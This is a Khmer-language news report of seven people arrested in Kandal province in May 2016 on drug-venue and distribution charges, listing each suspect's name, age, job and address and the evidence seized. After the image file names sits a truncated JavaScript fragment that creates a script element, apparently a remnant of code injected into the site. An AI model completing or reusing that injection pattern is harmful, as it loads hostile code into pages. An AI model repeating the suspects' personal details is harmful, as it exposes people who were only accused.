ព្រឹតិ្តការណ៍ថ្មីៗ

ជនសង្ស័យចចំនួន០៧នាក់ ត្រូវបានសមត្ថកិច្ចឃាត់ខ្លួនពីបទមិនរាងចាលផ្តល់ទីតាំងប្រើប្រាស់ និងចែកចាយខុសច្បាប់នូវសារធាតុ ញៀន

2 ឆ្នាំ មុន 6 តូ សុផល

ខេត្តកណ្តាល ៖ ជនសង្ស័យចចំនួន០៧នាក់ ត្រូវបានសមត្ថកិច្ចការិយាល័យប្រឆាំងគ្រឿងញៀននៃស្នងការដ្ឋាននគរបាលខេត្តកណ្តាលចាប់ឃាត់ខ្លួនពីបទមិនរាងចាលផ្តល់ទីតាំងប្រើប្រាស់ និងចែកចាយខុសច្បាប់នូវសារធាតុ ញៀនកើតឡើងនៅ ថ្ងៃទី២២ ឧសភា ឆ្នាំ២០១៦ នៅចំណុច បន្ទប់ជួល ភូមិកំពង់សំណាញ់ សង្កាត់កំពង់សំណាញ់ ក្រុងតាខ្មៅ ខេត្តកណ្តាល។
ជនសង្ស័យទាំង៧នាក់នោះមានឈ្មោះ
១.ឈ្មោះ មីុ ចិត្រា ភេទ ប្រុស អាយុ៣២ឆ្នាំជនជាតិខ្មែរ មុខរបរមិនពិតប្រាកដ ស្នាក់នៅបន្ទប់ជួល ភូមិកំពង់សំណាញ់ សង្កាត់កំពង់សំណាញ់ ក្រុងតាខ្មៅ ខេត្កណ្ដាល។
២.ឈ្មោះ អឿន វណ្ណៈ ភេទប្រុស អាយុ៣១ឆ្នំា ជនជាតិខ្មែរ មុខរបរលក់ដូរ មានទីលំនៅភូមិតាខ្មៅ សង្កាត់តាខ្មៅ ក្រុងតាខ្មៅ ខេត្តកណ្តាល។
៣.ឈ្មោះ នាត សីហាប់ ភេទប្រុស អាយុ២៦ឆ្នាំ ជនជាតិខ្មែរ មុខរបរអង្គរក្ស ទីលំនៅភូមិកន្ទុយទឹក សង្កាត់ទៀន ខណ្ឌដង្កោ ភ្នំពេញ។
៤.ឈ្មោះ ម៉េង ស៊ាងលី ភេទប្រុស អាយុ២២ឆ្នាំ ជនជាតិខ្មែរ មុខរបរអង្គរក្ស ទីលំនៅភូមិទួលពង្រ សង្កាត់ចោមចៅ ខណ្ឌដង្កោភ្នំពេញ។
៥.ឈ្មោះ ភួង សីុណា ភេទស្រី អាយុ២៦ឆ្នាំជនជាតិខ្មែរ មុខរបរមេផ្ទះ មានទីលំនៅភូមិកំពង់សំណាញ់ សង្កាត់កំពង់សំណាញ់ ក្រុងតាខ្មៅ ខេត្តកណ្តាល។
៦.ឈ្មោះ វង់ ស្រីពេជ្រ ភេទស្រី អាយុ២២ឆ្នាំជនជាតិខ្មែរ មុខរបរធ្វើការហាង ទីលំនៅបន្ទប់ជួល ភូមិកំពង់សំណាញ់ សង្កាត់ កំពង់សំណាញ់ ក្រុងតាខ្មៅ ខេត្តកណ្តាល។
៧.ឈ្មោះ ហៃ ស្រីមុំ ភេទស្រី អាយុ១៩ឆ្នាំជនជាតិខ្មែរ មុខរបរ ធ្វើការហាង ទីលំនៅបន្ទប់ជួល ភូមិកំពង់សំណាញ់ សង្កាត់កំពង់សំណាញ់ ក្រុងតាខ្មៅខេត្តកណ្តាល។.
វត្ថុតាងចាប់យក៖
-ជញ្ជីងសំរាប់ថ្លឹងគ្រឿងញៀនចំនួន០១គ្រឿង
-សម្ភារសម្រាប់វិចខ្ចប់ដើម្បីចែកចាយ និងប្រើប្រាស់មួយចំនួន
-ម៉ូតូចំនួន០២គ្រឿង (ម៉ូតូម៉ាកC125សេរី 2016ពណ៌ខ្មៅ ស្លាកលេខ ភ្នំពេញ 1FP-7204 និងម៉ូតូម៉ាកកូនទា C50ពណ៌ក្រហម គ្មានស្លាក់លេខ)
-ស្លាក់លេខម៉ូតូចំនួន០១
សូមបញ្ជាក់ថាក្រោយទទួលបានព័ត៌មាន និងបណ្តឹងរបស់ប្រជាពលរដ្ឋរស់នៅជិតនោះ ទីតាំងបន្ទប់ជួលខាងលើមាន
ការប្រើប្រាស់ និងចែកចាយគ្រឿងញៀនយ៉ាងសកម្ម កម្លាំងការិយាល័យជំនាញចុះសហការជាមួយកម្លាំងអធិការដ្ឋាននគរបាលក្រុងតាខ្មៅ ប៉ុស្តិ៍នគរបាលកំពុងសំណាញ់ និងអាជ្ញាធរមូលដ្ឋាន ចុះធ្វើរដ្ឋបាលត្រួតពិនិត្យទីតាំងខាងលើ បានធ្វើការឃាត់ខ្លួនបានជនសង្ស័យ០៧នាក់រួមជាមួយវត្ថុតាងបញ្ជូនមកស្នងការដ្ឋាននគរបាលខេត្តដើម្បីសួរនាំបន្ត និងចាត់ការតាមនីតិវិធី ។

13220949_1602498576731247_9146171091738539879_n   13239389_1602498540064584_2917943880468324035_n 13239908_1602498403397931_8405687467491425932_n 13240677_1602498423397929_6458406151162260586_n 13244672_1602498520064586_8307824072010320314_n 13245400_1602498546731250_1190428166423621397_n 13255956_1602498466731258_9087364941205161559_n 13256085_1602498473397924_2069972216316758357_n 13267700_1602498456731259_1023479796238991569_n13232972_1602498470064591_4202416622069062102_n13226881_1602498416731263_1666772849223757983_nvar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ